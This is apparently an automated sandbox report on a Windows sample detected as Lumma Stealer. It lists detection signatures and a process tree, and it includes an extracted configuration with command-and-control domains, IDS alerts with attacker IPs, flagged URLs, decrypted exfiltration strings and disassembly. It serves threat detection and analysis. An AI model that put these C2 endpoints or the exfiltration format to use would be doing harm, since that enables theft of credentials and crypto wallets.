
Windows Analysis Report
hpEAJnNwCB.exe

Overview

General Information

Sample name: hpEAJnNwCB.exe (renamed because original name is a hash value)
Original sample name: 07a0b87962fbee50d2adc913f06a3e3b.exe
Analysis ID: 1576575
MD5: 07a0b87962fbee50d2adc913f06a3e3b
SHA1: 1d8772e4953a5644fed016c3603f7db6aeffaa2a
SHA256: 85e572ae248f77ea01360746b27349c2baed236a9790e1c1ec7889d35ee1787f
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • hpEAJnNwCB.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\hpEAJnNwCB.exe" MD5: 07A0B87962FBEE50D2ADC913F06A3E3B)
    • 91B1.tmp.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Local\Temp\91B1.tmp.exe" MD5: CC2566EAE03240FFC314E5BEE2DC4D26)
      • WerFault.exe (PID: 376 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 860 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration: {"C2 url": ["deafeninggeh.biz", "wrathful-jammy.cyou", "debonairnukk.xyz", "diffuculttan.xyz", "sordid-snaked.cyou", "immureprech.biz", "effecterectz.xyz", "awake-weaves.cyou"], "Build id": "4h5VfH--"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | -

00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
00000003.00000003.1390576306.00000000024E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x12a0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x1130:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -

3.2.91B1.tmp.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
3.2.91B1.tmp.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
3.3.91B1.tmp.exe.24e0000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
3.3.91B1.tmp.exe.24e0000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T09:42:51.496307+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49736 | 45.77.249.79 | 443 | TCP
2024-12-17T09:42:55.294008+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49748 | 104.131.68.180 | 443 | TCP
2024-12-17T09:42:58.661848+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49756 | 104.121.10.34 | 443 | TCP
2024-12-17T09:42:52.466380+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49736 | 45.77.249.79 | 443 | TCP
2024-12-17T09:42:55.716435+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49748 | 104.131.68.180 | 443 | TCP
2024-12-17T09:42:52.466380+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.10 | 49736 | 45.77.249.79 | 443 | TCP
2024-12-17T09:42:55.716435+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.10 | 49748 | 104.131.68.180 | 443 | TCP
2024-12-17T09:42:55.294008+0100 | 2058215 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49748 | 104.131.68.180 | 443 | TCP
2024-12-17T09:42:51.496307+0100 | 2058223 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49736 | 45.77.249.79 | 443 | TCP
2024-12-17T09:42:56.659991+0100 | 2058210 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 51525 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:52.600050+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 60706 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:53.587292+0100 | 2058214 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 60706 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:56.205224+0100 | 2058216 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 56891 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:55.979277+0100 | 2058218 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 57774 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:55.722626+0100 | 2058220 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 54262 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:48.126339+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 58446 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:49.117774+0100 | 2058222 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 58446 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:47.903636+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 63742 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:56.983802+0100 | 2058226 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 50695 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:56.428498+0100 | 2058236 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 55967 | 1.1.1.1 | 53 | UDP
2024-12-17T09:42:42.435931+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49709 | 104.21.56.70 | 443 | TCP
2024-12-17T09:42:44.008488+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49715 | 176.113.115.19 | 80 | TCP
2024-12-17T09:42:51.498310+0100 | 2822521 | 1 | Domain Observed Used for C2 Detected | 45.77.249.79 | 443 | 192.168.2.10 | 49736 | TCP
2024-12-17T09:42:55.296923+0100 | 2822521 | 1 | Domain Observed Used for C2 Detected | 104.131.68.180 | 443 | 192.168.2.10 | 49748 | TCP
2024-12-17T09:42:59.448751+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49756 | 104.121.10.34 | 443 | TCP

AV Detection

Source: https://effecterectz.xyz/apim | Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/0g | Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE~ | Avira URL Cloud: Label: malware
Source: https://deafeninggeh.biz/apiV | Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DE6 | Avira URL Cloud: Label: malware
Source: https://effecterectz.xyz/P | Avira URL Cloud: Label: malware
Source: 3.2.91B1.tmp.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "wrathful-jammy.cyou", "debonairnukk.xyz", "diffuculttan.xyz", "sordid-snaked.cyou", "immureprech.biz", "effecterectz.xyz", "awake-weaves.cyou"], "Build id": "4h5VfH--"}
Source: https://effecterectz.xyz/apim | Virustotal: Detection: 17%
Source: hpEAJnNwCB.exe | Virustotal: Detection: 40%
Source: hpEAJnNwCB.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Joe Sandbox ML: detected
Source: hpEAJnNwCB.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: awake-weaves.cyou
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: debonairnukk.xyz
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: diffuculttan.xyz
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: effecterectz.xyz
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: deafeninggeh.biz
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: immureprech.biz
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: Workgroup: -
Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp | String decryptor: 4h5VfH--

Compliance

Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Unpacked PE file: 0.2.hpEAJnNwCB.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Unpacked PE file: 3.2.91B1.tmp.exe.400000.0.unpack
Source: hpEAJnNwCB.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.10:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.10:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.121.10.34:443 -> 192.168.2.10:49756 version: TLS 1.2
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004389F2 FindFirstFileExW | 0_2_004389F2
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_024C8C59 FindFirstFileExW | 0_2_024C8C59
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h | 3_2_0043CD60
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, edx | 3_2_0040BDC9
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp al, 2Eh | 3_2_00426054
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then jmp eax | 3_2_00426054
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_0043B05D
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_0043B05D
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_0043B068
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh] | 3_2_0040E83B
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_0043B05B
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_0043B05B
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov edx, ecx | 3_2_0040A940
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h] | 3_2_0040C917
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then jmp ecx | 3_2_0043C1F0
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h | 3_2_00425990
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ecx, di | 3_2_00425990
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_0043B195
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movsx eax, byte ptr [esi] | 3_2_0043B9A1
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh | 3_2_004369A0
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [ecx+edx] | 3_2_0041E9B0
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 3_2_004299B0
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then lea eax, dword ptr [esp+18h] | 3_2_0042526A
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ebx, edi | 3_2_0041D270
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov esi, eax | 3_2_00423A34
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h | 3_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 3_2_0043D2F0
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then jmp ecx | 3_2_0043C280
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edi+eax] | 3_2_00415298
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov word ptr [eax], dx | 3_2_00415298
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0043AAB2
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov word ptr [ebp+00h], 0000h | 3_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 3_2_004252BA
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov eax, ebx | 3_2_0041CB05
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h | 3_2_0043CB20
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov edx, eax | 3_2_00427326
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 3_2_0042A3D0
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042C45C
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ebp, dword ptr [eax] | 3_2_00436C00
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 3_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, dword ptr [esi+64h] | 3_2_00418578
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov edx, eax | 3_2_0042750D
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_00421D10
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+ecx] | 3_2_0040DD25
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh] | 3_2_00417582
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h] | 3_2_00427DA2
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h | 3_2_004205B0
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_0042C64A
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042AE48
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then jmp eax | 3_2_00426E50
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 3_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042B4F7
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_00414624
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042AE24
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 3_2_00433630
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_0042C6E4
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h] | 3_2_00425E90
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h | 3_2_0043CE90
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_004166A0
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_0041BEA0
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0042ADF4
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov eax, edx | 3_2_0041C6BB
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then jmp eax | 3_2_0043BF40
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h] | 3_2_00415F66
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h | 3_2_00419770
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov edx, dword ptr [ebp-10h] | 3_2_0043A777
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h] | 3_2_00409700
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-46h] | 3_2_00409700
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+16h] | 3_2_00409700
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_0042C726
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_0042C735
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 3_2_0040CFF3
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h] | 3_2_0040CFF3
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov byte ptr [ebp+00h], al | 3_2_0041DF80
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h] | 3_2_0040D7A2
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h] | 3_2_0040D7A2
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov byte ptr [edi], al | 3_2_0249D25A
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h] | 3_2_0249D25A
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then jmp eax | 3_2_024CC268
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_024CB2CF
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_024CB2CF
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_024CB2C4
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_024CB2C4
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h | 3_2_024CB2C2
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_024CB2C2
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h] | 3_2_024CB3FC
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp al, 2Eh | 3_2_024B63B6
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, edx | 3_2_0249C030
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then jmp eax | 3_2_024B70E4
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h | 3_2_024CD0F7
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h] | 3_2_024B60F7
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024BB08B
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024BB0AF
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024BB05B
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov byte ptr [ebp+00h], al | 3_2_024AE1E7
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 3_2_024BA637
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024BC6C3
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 3_2_024BB763
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_024BB763
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then jmp eax | 3_2_024B6739
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, dword ptr [esi+64h] | 3_2_024A87DF
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh] | 3_2_024A77E9
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then jmp ecx | 3_2_024CC79B
